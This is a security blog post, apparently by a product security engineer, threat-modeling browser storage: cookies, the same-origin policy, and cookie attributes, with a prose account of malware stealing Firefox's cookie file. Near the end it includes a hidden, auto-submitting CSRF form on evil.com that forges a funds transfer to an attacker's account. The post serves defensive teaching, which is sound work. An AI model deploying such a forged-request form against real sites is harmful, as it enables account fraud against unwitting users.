<!doctype html>














<!-- `site.alt_lang` can specify a language different from the UI -->
<html lang="en" >
  <head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="theme-color" media="(prefers-color-scheme: light)" content="#f7f7f7">
  <meta name="theme-color" media="(prefers-color-scheme: dark)" content="#1b1b1e">
  <meta name="mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta
    name="viewport"
    content="width=device-width, user-scalable=no initial-scale=1, shrink-to-fit=no, viewport-fit=cover"
  ><!-- Setup Open Graph image -->

  

  <!-- Begin Jekyll SEO tag v2.8.0 -->
<meta name="generator" content="Jekyll v4.4.1" />
<meta property="og:title" content="Threat Modeling Browser’s Storage" />
<meta property="og:locale" content="en" />
<meta name="description" content="Threat Modeling Browser’s Storage" />
<meta property="og:description" content="Threat Modeling Browser’s Storage" />
<link rel="canonical" href="https://sureshpantha.com.np/posts/Threat-Modeling-Browser-s-Storage/" />
<meta property="og:url" content="https://sureshpantha.com.np/posts/Threat-Modeling-Browser-s-Storage/" />
<meta property="og:site_name" content="Seku’s Blog" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2025-05-29T00:00:00+05:45" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Threat Modeling Browser’s Storage" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2025-05-29T11:46:58+05:45","datePublished":"2025-05-29T00:00:00+05:45","description":"Threat Modeling Browser’s Storage","headline":"Threat Modeling Browser’s Storage","mainEntityOfPage":{"@type":"WebPage","@id":"https://sureshpantha.com.np/posts/Threat-Modeling-Browser-s-Storage/"},"url":"https://sureshpantha.com.np/posts/Threat-Modeling-Browser-s-Storage/"}</script>
<!-- End Jekyll SEO tag -->


  <title>Threat Modeling Browser’s Storage | Seku's Blog
  </title>

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
-->



<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">

<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico">
<meta name="apple-mobile-web-app-title" content="Seku's Blog">
<meta name="application-name" content="Seku's Blog">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">


  <!-- Resource Hints -->
  
    
      
        <link rel="preconnect" href="https://fonts.googleapis.com" >
      
        <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
      
    
      
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      
        <link rel="dns-prefetch" href="https://fonts.gstatic.com" >
      
    
      
        <link rel="preconnect" href="https://cdn.jsdelivr.net" >
      
        <link rel="dns-prefetch" href="https://cdn.jsdelivr.net" >
      
    
  

  <!-- Bootstrap -->
  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.6/dist/css/bootstrap.min.css">
  

  <!-- Theme style -->
  <link rel="stylesheet" href="/assets/css/jekyll-theme-chirpy.css">

  <!-- Web Font -->
  <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato:wght@300;400&family=Source+Sans+Pro:wght@400;600;700;900&display=swap">

  <!-- Font Awesome Icons -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.7.1/css/all.min.css">

  <!-- 3rd-party Dependencies -->

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/tocbot@4.32.2/dist/tocbot.min.css">
  

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.min.css">
  

  
    <!-- Image Popup -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/glightbox@3.3.0/dist/css/glightbox.min.css">
  

  <!-- Scripts -->

  <script src="/assets/js/dist/theme.min.js"></script>

  <!-- JS selector for site. -->

<!-- commons -->



<!-- layout specified -->


  

  
    <!-- image lazy-loading & popup & clipboard -->
    
  















  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  



  <script defer src="https://cdn.jsdelivr.net/combine/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js,npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.umd.min.js,npm/glightbox@3.3.0/dist/js/glightbox.min.js,npm/clipboard@2.0.11/dist/clipboard.min.js,npm/dayjs@1.11.13/dayjs.min.js,npm/dayjs@1.11.13/locale/en.js,npm/dayjs@1.11.13/plugin/relativeTime.js,npm/dayjs@1.11.13/plugin/localizedFormat.js,npm/tocbot@4.32.2/dist/tocbot.min.js"></script>







<script defer src="/assets/js/dist/post.min.js"></script>



<!-- Pageviews -->

  

  



  

  <!-- A placeholder to allow defining custom metadata -->

</head>


  <body>
    <!-- The Side Bar -->

<aside aria-label="Sidebar" id="sidebar" class="d-flex flex-column align-items-end">
  <header class="profile-wrapper">
    <a href="/" id="avatar" class="rounded-circle"><img src="/assets/img/logo.svg" width="112" height="112" alt="avatar" onerror="this.style.display='none'"></a>

    <a class="site-title d-block" href="/">Seku's Blog</a>
    <p class="site-subtitle fst-italic mb-0">Chronicles of a Product Security Engineer</p>
  </header>
  <!-- .profile-wrapper -->

  <nav class="flex-column flex-grow-1 w-100 ps-0">
    <ul class="nav">
      <!-- home -->
      <li class="nav-item">
        <a href="/" class="nav-link">
          <i class="fa-fw fas fa-home"></i>
          <span>HOME</span>
        </a>
      </li>
      <!-- the real tabs -->
      
        <li class="nav-item">
          <a href="/categories/" class="nav-link">
            <i class="fa-fw fas fa-stream"></i>
            

            <span>CATEGORIES</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/tags/" class="nav-link">
            <i class="fa-fw fas fa-tags"></i>
            

            <span>TAGS</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/archives/" class="nav-link">
            <i class="fa-fw fas fa-archive"></i>
            

            <span>ARCHIVES</span>
          </a>
        </li>
        <!-- .nav-item -->
      
    </ul>
  </nav>

  <div class="sidebar-bottom d-flex flex-wrap  align-items-center w-100">
    
      <button type="button" class="btn btn-link nav-link" aria-label="Switch Mode" id="mode-toggle">
        <i class="fas fa-adjust"></i>
      </button>

      
        <span class="icon-border"></span>
      
    

    
      

      
        <a
          href="https://github.com/sayx1"
          aria-label="github"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fab fa-github"></i>
        </a>
      
    
      

      
        <a
          href="javascript:location.href = 'mailto:' + ['sureshpantha','proton.me'].join('@')"
          aria-label="email"
          

          

          

          
        >
          <i class="fas fa-envelope"></i>
        </a>
      
    
      

      
        <a
          href="/in/sayx1"
          aria-label="linkedin"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fab fa-linkedin"></i>
        </a>
      
    
  </div>
  <!-- .sidebar-bottom -->
</aside>
<!-- #sidebar -->


    <div id="main-wrapper" class="d-flex justify-content-center">
      <div class="container d-flex flex-column px-xxl-5">
        <!-- The Top Bar -->

<header id="topbar-wrapper" class="flex-shrink-0" aria-label="Top Bar">
  <div
    id="topbar"
    class="d-flex align-items-center justify-content-between px-lg-3 h-100"
  >
    <nav id="breadcrumb" aria-label="Breadcrumb">
      

      
        
          
            <span>
              <a href="/">Home</a>
            </span>

          
        
          
        
          
            
              <span>Threat Modeling Browser’s Storage</span>
            

          
        
      
    </nav>
    <!-- endof #breadcrumb -->

    <button type="button" id="sidebar-trigger" class="btn btn-link" aria-label="Sidebar">
      <i class="fas fa-bars fa-fw"></i>
    </button>

    <div id="topbar-title">
      Post
    </div>

    <button type="button" id="search-trigger" class="btn btn-link" aria-label="Search">
      <i class="fas fa-search fa-fw"></i>
    </button>

    <search id="search" class="align-items-center ms-3 ms-lg-0">
      <i class="fas fa-search fa-fw"></i>
      <input
        class="form-control"
        id="search-input"
        type="search"
        aria-label="search"
        autocomplete="off"
        placeholder="Search..."
      >
    </search>
    <button type="button" class="btn btn-link text-decoration-none" id="search-cancel">Cancel</button>
  </div>
</header>


        <div class="row flex-grow-1">
          <main aria-label="Main Content" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              <!-- Refactor the HTML structure -->



<!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->



<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->



<!-- Change the icon of checkbox -->



<!-- Handle images -->




  
  

  
    
      
      
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  

  


<!-- Add header for code snippets -->



<!-- Create heading anchors -->





  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  

  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  

  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  

  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  




<!-- return -->










<article class="px-1" data-toc="true">
  <header>
    <h1 data-toc-skip>Threat Modeling Browser’s Storage</h1>
    

    <div class="post-meta text-muted">
      <!-- published date -->
      <span>
        Posted
        <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1748456100"
  data-df="ll"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  May 29, 2025
</time>

      </span>

      <!-- lastmod date -->
      
        <span>
          Updated
          <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1748498518"
  data-df="ll"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  May 29, 2025
</time>

        </span>
      

      

      <div class="d-flex justify-content-between">
        <!-- author(s) -->
        <span>
          

          By

          <em>
            
              <a href="https://github.com/sayx1">sayx1</a>
            
          </em>
        </span>

        <div>
          <!-- pageviews -->
          

          <!-- read time -->
          <!-- Calculate the post's reading time, and display the word count in tooltip -->



<!-- words per minute -->










<!-- return element -->
<span
  class="readtime"
  data-bs-toggle="tooltip"
  data-bs-placement="bottom"
  title="3073 words"
>
  <em>17 min</em> read</span>

        </div>
      </div>
    </div>
  </header>

  
    <div id="toc-bar" class="d-flex align-items-center justify-content-between invisible">
      <span class="label text-truncate">Threat Modeling Browser’s Storage</span>
      <button type="button" class="toc-trigger btn me-1">
        <i class="fa-solid fa-list-ul fa-fw"></i>
      </button>
    </div>

    <button id="toc-solo-trigger" type="button" class="toc-trigger btn btn-outline-secondary btn-sm">
      <span class="label ps-2 pe-1">Contents</span>
      <i class="fa-solid fa-angle-right fa-fw"></i>
    </button>

    <dialog id="toc-popup" class="p-0">
      <div class="header d-flex flex-row align-items-center justify-content-between">
        <div class="label text-truncate py-2 ms-4">Threat Modeling Browser’s Storage</div>
        <button id="toc-popup-close" type="button" class="btn mx-1 my-1 opacity-75">
          <i class="fas fa-close"></i>
        </button>
      </div>
      <div id="toc-popup-content" class="px-4 py-3 pb-4"></div>
    </dialog>
  

  <div class="content">
    <h1 id="threat-modeling-browsers-storage">Threat Modeling Browser’s Storage</h1>

<h2 id="introduction"><span class="me-2">Introduction</span><a href="#introduction" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>In the early days of the World Wide Web, websites were primarily static. The server responded with the same static file (say <code class="language-plaintext highlighter-rouge">home.html</code> for the home page) without any user-specific personalization on every request. Every visitor to any web application receives identical content from the server. As web applications evolved, the need to have personalized content tailored to each user became a necessity. Websites needed to store data and generate customized content in real time based on user interaction, specific requests, and/or backend processes. This required the servers to store user information and verify the user’s identity when serving the requests. As HTTP is a stateless protocol, web applications require a way to store user-identifying information on the client side, which could be sent with every request. <a href="https://hiddenheroes.netguru.com/lou-montulli">Thus, the cookie was born</a>.</p>

<p>The predominant architecture that emerged from all this involves server-side storage of user data, with browsers maintaining session information to identify logged-in users and facilitate personalized content delivery.</p>

<p><a href="/assets/img/pa.png" class="popup img-link shimmer"><img src="/assets/img/pa.png" alt="cookie" loading="lazy"></a></p>

<p>Web applications have become integral to our lives as the internet has grown. Everything is moving to the web, and web applications are becoming sophisticated and feature-rich. The data the server needs to send on each request is growing exponentially. If data is only stored on the server and transmitted on each request, the load times for each website would be very high. Storing some of the information from previous requests on the client end significantly increases the response times, removes the burden on the server to serve huge amounts of data in each request, and allows the javascript running on the browser to give unique user experiences. 
Today, web applications store significant information on the client side in the browsers.</p>

<p><a href="/assets/img/pa_user.png" class="popup img-link shimmer"><img src="/assets/img/pa_user.png" alt="pa_user" loading="lazy"></a></p>

<p>As more websites increasingly rely on client-side storage for rich user experiences, this data becomes an attractive target for attackers trying to steal sensitive data, impersonate users, or disrupt services.</p>

<p>As there are multiple ways of storing this data on the browser, each coming with its own advantages and disadvantages, it becomes essential for development teams to learn about the risks associated with each form of storage and ensure safeguards are in place to address the issue.</p>

<h2 id="access-to-client-side-storage"><span class="me-2">Access to Client-Side Storage</span><a href="#access-to-client-side-storage" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>Like any other program in your operating system, browsers run as a process. When it’s running, this process gets its own set of memory. In modern browsers, this often means a main browser process can spawn separate, isolated processes for each website (or group of websites) you visit. These are typically child processes of the main browser process. In most modern browsers, a site is run as an isolated child process that has only access to its data in the memory.  A process can write to disk and fetch from it. Most modern operating systems have discretionary access control, meaning access to data is based on the user’s identity. This means that anything stored on the client side by any web application is stored within files that high-privileged users can access, say, Administrators and root users (and malware that has gained permission from said high-privileged users).</p>

<p>For example, Mozilla stores all of its cookies inside a file called cookies.sqlite, which resides within <a href="https://stackoverflow.com/questions/7610896/how-do-i-use-sqlite-to-read-data-from-the-firefox-cookies-file">Mozilla’s profile directory</a>. It takes a simple SQLite3 reader to parse the file and <a href="https://www.blackhillsinfosec.com/your-browser-is-not-a-safe-space/">extract sensitive information</a>.</p>

<h4 id="attack-example--malware-stealing-cookies"><span class="me-2">Attack Example : Malware Stealing Cookies</span><a href="#attack-example--malware-stealing-cookies" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p>Imagine malware running on a user’s computer. This malware could locate the cookies.sqlite file (for Firefox) or similar files for other browsers. It could then exfiltrate this file to an attacker’s server. The attacker could then parse this file, extract session cookies for various websites (like your bank or email), and potentially hijack those sessions, gaining unauthorized access to your accounts. The article ‘Your Browser is Not a Safe Space’ demonstrates how easily this can be done.”</p>

<p>This isolation between multiple websites running in the browser is further strengthed by Same-Origin Policy (SOP). Say a user logs on to a malicious website crafted by the attacker. To prevent a malicious website from freely accessing data from another website opened in your browser, browsers implement a critical security control called the Same-Origin Policy (SOP).</p>

<p>The Same-origin Policy governs access to client-side information for the sites rendered in a browser. A document’s origin is a unique identifier that combines protocol (https://), domain (<a href="http://example.com/">example.com</a>), and port number (443).</p>

<p>The same-origin policy states <a href="https://en.wikipedia.org/wiki/Same-origin_policy">that a web browser permits scripts contained in a first web page to access data on a second web page, but only if both web pages have the same <em>origin</em></a>.</p>

<p>Two URLs have the <em>same origin</em> if the</p>
<ul>
  <li><a href="https://developer.mozilla.org/en-US/docs/Glossary/Protocol">protocol</a>,</li>
  <li><a href="https://developer.mozilla.org/en-US/docs/Glossary/Port">port</a> (if specified), and</li>
  <li><a href="https://developer.mozilla.org/en-US/docs/Glossary/Host">Host</a> is the same for both URLs.</li>
</ul>

<p>Websites with the same scheme, hostname, and port combination are considered “same-origin.”</p>

<p>Here’s a table illustrating Same-Origin Policy scenarios using <strong><em>sureshpantha.com.np</em></strong> as the base origin:</p>

<div class="table-wrapper"><table>
  <thead>
    <tr>
      <th>Origin</th>
      <th>Same/Different</th>
      <th>Reason</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td><a href="https://sureshpantha.com.np">https://sureshpantha.com.np</a></td>
      <td>Same Origin</td>
      <td>Identical protocol, hostname, port</td>
    </tr>
    <tr>
      <td><a href="http://sureshpantha.com.np">http://sureshpantha.com.np</a></td>
      <td>Different Origin</td>
      <td>Different protocol (http vs https)</td>
    </tr>
    <tr>
      <td><a href="https://www.sureshpantha.com.np">https://www.sureshpantha.com.np</a></td>
      <td>Different Origin</td>
      <td>Different subdomain</td>
    </tr>
    <tr>
      <td><a href="https://sureshpantha.com.np:8080">https://sureshpantha.com.np:8080</a></td>
      <td>Different Origin</td>
      <td>Different port</td>
    </tr>
    <tr>
      <td><a href="https://example.com">https://example.com</a></td>
      <td>Different Origin</td>
      <td>Different hostname</td>
    </tr>
    <tr>
      <td><a href="https://sureshpantha.com.np/page">https://sureshpantha.com.np/page</a></td>
      <td>Same Origin</td>
      <td>Path doesn’t affect origin</td>
    </tr>
  </tbody>
</table></div>

<h2 id="client-side-storage"><span class="me-2">Client-Side Storage</span><a href="#client-side-storage" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>Browsers store information about users, sessions, or site preferences directly on the client device, which is client-side storage. By storing data on the client side, developers can significantly reduce load times and make websites more responsive and reliable. Storing sensitive data on the client side opens it up to attacks and can lead to significant exposure. Understanding how data is stored and accessed helps web developers decide where to store data safely.</p>

<p>In modern web applications, we can store data in the client’s browser in one of the following ways:</p>
<ul>
  <li><a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies"><strong>Cookies</strong></a></li>
  <li><a href="https://developer.mozilla.org/en-US/docs/Web/API/Web_Storage_API/Using_the_Web_Storage_API"><strong>Web Storage API</strong></a>
    <ul>
      <li><a href="https://developer.mozilla.org/en-US/docs/Web/API/Window/localStorage"><strong>Local Storage</strong></a></li>
      <li><a href="https://developer.mozilla.org/en-US/docs/Web/API/Window/sessionStorage"><strong>Session Storage</strong></a></li>
    </ul>
  </li>
</ul>

<h3 id="cookies"><span class="me-2">Cookies</span><a href="#cookies" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>HTTP cookies are data stored in the client’s device, which enables websites to track sessions, remember user preferences, and personalize web experiences. A cookie is transmitted through the <code class="language-plaintext highlighter-rouge">Cookie</code> Header after being set by the server using the <code class="language-plaintext highlighter-rouge">Set-Cookie</code> response header.</p>

<p><a href="/assets/img/cookie.png" class="popup img-link shimmer"><img src="/assets/img/cookie.png" alt="cookie" loading="lazy"></a></p>

<p>Along with the key-value pair, the server can set an expiry date after which the cookie expires. If no date is set, session cookies (without an expiration date) expire when the browser is closed. If an Expires or Max-Age attribute is not set, the cookie is a ‘session cookie’ and is deleted when the browser closes. If these attributes are set, it becomes a ‘persistent cookie’ and lasts until the specified date/time.</p>

<p>The cookies set for a site are sent to the server for every subsequent request.</p>

<p><a href="/assets/img/cookie-send.png" class="popup img-link shimmer"><img src="/assets/img/cookie-send.png" alt="cookie-send" loading="lazy"></a></p>

<p>| <strong>Attribute</strong>     | <strong>Details</strong>                                                                                                                              |
| —————– | —————————————————————————————————————————————- |
| <strong>Use Case</strong>      | Small Pieces of information about user preferences, user tracking, session management, and remembering stateful information              |
| <strong>Expiration</strong>    | Session-based (deleted when session is closed ), can be made persistent by setting up expiry date                                        |
| <strong>Data Capacity</strong> | 4 KB per cookie. Each browser has a threshold for <a href="http://browsercookielimits.iain.guru/">how many cookies are allowed per site</a>.        |
| <strong>Constraints</strong>   | - Cookies are sent with every request to the server- Access to cookies are subject to security policies and same-origin restrictions |</p>
<h4 id="who-can-access-cookies-associated-with-a-domain"><span class="me-2">Who can access cookies associated with a domain?</span><a href="#who-can-access-cookies-associated-with-a-domain" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>

<p>In terms of access to the data stored inside the cookies,</p>
<h5 id="same-origin-access"><span class="me-2">Same-Origin Access</span><a href="#same-origin-access" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h5>
<p>A cookie set by <code class="language-plaintext highlighter-rouge">example.com</code> can be accessed by any JavaScript running on any page from the same origin by default. We can also explicitly specify which subpages have access to the cookie using the <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies#define_where_cookies_are_sent">Path attribute</a>.</p>

<blockquote>
  <p>The <code class="language-plaintext highlighter-rouge">Path</code> attribute indicates a URL path that must exist in the requested URL in order to send the <code class="language-plaintext highlighter-rouge">Cookie</code> header.</p>
</blockquote>

<p>Cookies can be accessed by subdomains if the <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies#define_where_cookies_are_sent">Domain attribute</a> is set while the cookie is being set.</p>

<blockquote>
  <p>The <code class="language-plaintext highlighter-rouge">Domain</code> attribute specifies which server can receive a cookie. If specified, cookies are available on the specified server and its subdomains. For example, if you set <code class="language-plaintext highlighter-rouge">Domain=mozilla.org</code> from <code class="language-plaintext highlighter-rouge">mozilla.org</code>, cookies are available on that domain and subdomains like <code class="language-plaintext highlighter-rouge">developer.mozilla.org</code>.</p>
</blockquote>

<p>Access to cookie data by Javascript can be completely <a href="https://portswigger.net/web-security/csrf/bypassing-samesite-restrictions">almost</a> restricted by using the <code class="language-plaintext highlighter-rouge">HttpOnly</code> flag. This ensures that the cookie is safe from XXS vulnerabilities present in the page.</p>

<blockquote>
  <p>A cookie with the <code class="language-plaintext highlighter-rouge">HttpOnly</code> attribute can’t be accessed by JavaScript, for example using <a href="https://developer.mozilla.org/en-US/docs/Web/API/Document/cookie"><code class="language-plaintext highlighter-rouge">Document.cookie</code></a>; it can only be accessed when it reaches the server. Cookies that persist user sessions for example should have the <code class="language-plaintext highlighter-rouge">HttpOnly</code> attribute set — it would be really insecure to make them available to JavaScript. This precaution helps mitigate cross-site scripting (<a href="https://developer.mozilla.org/en-US/docs/Web/Security/Types_of_attacks#cross-site_scripting_xss">XSS</a>) attacks.</p>
</blockquote>

<h5 id="browser-access"><span class="me-2">Browser Access</span><a href="#browser-access" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h5>
<ul>
  <li>Users can view and delete cookies through browser settings/dev tools.</li>
  <li>Browser extensions with appropriate permissions can access cookies.</li>
  <li>The browser itself manages and enforces cookie access controls.</li>
</ul>

<h5 id="server-side-access"><span class="me-2">Server-Side Access</span><a href="#server-side-access" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h5>
<ul>
  <li>The web server of the domain that sets the cookie receives cookies in HTTP requests</li>
  <li>Back-end services of that domain can process cookie data</li>
  <li>Load balancers/proxies in front of the server may also see cookies</li>
</ul>

<h4 id="security-considerations"><span class="me-2">Security Considerations</span><a href="#security-considerations" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<ul>
  <li>Cookies are protected using the same origin policy, where data stored is scoped to the document’s origin, meaning the webpage can only access data if it has the same origin by default.</li>
  <li>This means that if an attacker can inject JavaScript into a webpage (XSS), that attacker-controlled JavaScript can access all stored cookies in the client’s browser.</li>
  <li>As cookies have to be sent with each request, they can be stolen if an attacker gets access to these requests eg . Load balancers/proxies</li>
  <li>Several attributes have been introduced which can be sent with the Set-Cookie header to ensure the browser handles cookies in a certain way;
    <ul>
      <li>
        <p><code class="language-plaintext highlighter-rouge">Secure</code> attribute instructs the browser to only send the cookie over encrypted HTTPS connections.</p>
      </li>
      <li>
        <p>Cookies with <code class="language-plaintext highlighter-rouge">HTTPOnly</code> attribute are not accessible from Javascript and, therefore, unaffected by cross-site scripting (XSS) attacks.</p>
      </li>
      <li>Cookies’ <code class="language-plaintext highlighter-rouge">Path</code> and <code class="language-plaintext highlighter-rouge">Domain</code> attributes precisely control cookie accessibility across web applications.
        <ul>
          <li>
            <p>The <code class="language-plaintext highlighter-rouge">Path</code> attribute restricts a cookie to specific server routes—for instance, setting <code class="language-plaintext highlighter-rouge">Path=/admin</code> ensures a cookie is only accessible within administrative sections, preventing other application segments from reading it.</p>
          </li>
          <li>
            <p>Similarly, the <code class="language-plaintext highlighter-rouge">Domain</code> attribute allows cookie sharing across subdomains; using <code class="language-plaintext highlighter-rouge">Domain=.example.com</code> enables a single cookie to be valid for <code class="language-plaintext highlighter-rouge">blog.example.com</code>, <code class="language-plaintext highlighter-rouge">store.example.com</code>, and <code class="language-plaintext highlighter-rouge">www.example.com</code>, facilitating unified authentication and tracking across different service endpoints while maintaining security boundaries.</p>
          </li>
        </ul>
      </li>
      <li>The SameSite cookie attribute controls how cookies are handled in cross-site requests, helping protect against Cross-Site Request Forgery (CSRF) attacks. It offers three settings:
        <ul>
          <li>Strict (most secure, only sends cookies in first-party context),</li>
          <li>Lax (default, allows cookies in top-level navigations), and</li>
          <li>None (allows cross-site cookie transmission, requires Secure flag).</li>
        </ul>
      </li>
    </ul>
  </li>
</ul>

<h4 id="attack-example--cross-site-request-forgery-csrf"><span class="me-2">Attack Example : Cross-Site Request Forgery (CSRF)</span><a href="#attack-example--cross-site-request-forgery-csrf" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p>Imagine you are logged into yourbank.com. Then, you visit a malicious website, evil.com. If yourbank.com’s cookies don’t use SameSite=Lax or SameSite=Strict, evil.com could host a hidden form that automatically submits a request to yourbank.com/transfer_funds with the attacker’s account details.</p>

<div class="language-html highlighter-rouge"><div class="code-header">
        <span data-label-text="HTML"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre></td><td class="rouge-code"><pre><span class="c">&lt;!-- On evil.com --&gt;</span>
<span class="nt">&lt;form</span> <span class="na">id=</span><span class="s">"csrfForm"</span> <span class="na">action=</span><span class="s">"https://yourbank.com/transfer_funds"</span> <span class="na">method=</span><span class="s">"POST"</span> <span class="na">style=</span><span class="s">"display:none;"</span><span class="nt">&gt;</span>
  <span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"hidden"</span> <span class="na">name=</span><span class="s">"to_account"</span> <span class="na">value=</span><span class="s">"attacker_account_number"</span> <span class="nt">/&gt;</span>
  <span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"hidden"</span> <span class="na">name=</span><span class="s">"amount"</span> <span class="na">value=</span><span class="s">"1000"</span> <span class="nt">/&gt;</span>
  <span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"submit"</span> <span class="na">value=</span><span class="s">"Click for free prize!"</span> <span class="nt">/&gt;</span> <span class="c">&lt;!-- Or auto-submit with JS --&gt;</span>
<span class="nt">&lt;/form&gt;</span>
<span class="nt">&lt;script&gt;</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">'</span><span class="s1">csrfForm</span><span class="dl">'</span><span class="p">).</span><span class="nf">submit</span><span class="p">();</span> <span class="nt">&lt;/script&gt;</span>
    
</pre></td></tr></tbody></table></code></div></div>

<p>When this form submits, your browser would automatically include your yourbank.com cookies (like your session cookie) with the request, potentially authorizing the transfer without your knowledge. The SameSite attribute helps prevent this by controlling when cookies are sent with cross-site requests.”</p>

